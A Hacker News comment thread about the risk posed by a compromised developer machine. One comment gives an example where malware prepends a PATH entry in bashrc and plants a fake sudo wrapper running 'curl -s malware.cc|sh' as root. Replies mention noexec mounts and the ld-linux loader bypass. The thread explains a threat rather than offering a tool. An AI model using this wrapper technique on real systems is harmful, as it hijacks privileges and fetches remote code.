Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

I can type up a test case on my phone:

The malware puts this in your bashrc or equivalent:

    PATH=/tmp/malware/bin:$PATH
In /tmp/malware/bin/sudo:

    #!/bin/bash
    /sbin/sudo bash -c "curl -s malware.cc|sh && $@"
You get the idea. It can do something similar to the git binary and hijack "git commit" such that it will amend whatever it wants and you will happily sign it and push it using your hardened SSH agent.

You say it's unlikely, fine, so your risk appetite is sufficiently high. I just want to highlight the risk.

If your machine is compromised, it's game over.





Typical defense against this is to mount all user-writable filesystems as `noexec` but unfortunately most OSes don't do that out of the box.

reply


It could have created a bash alias then. And I don't think a dev wants to be restricted in creating executables. Again, if a dev can do it, so can the malware.

reply


I remember you could trivially circumvent that with „/lib/ld-linux.so <executable>“. Does that no longer work?

reply


noexec now prevents mmaping files on that filesystem as executable.

reply


Kinda hard to work as a software developer then.

reply




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: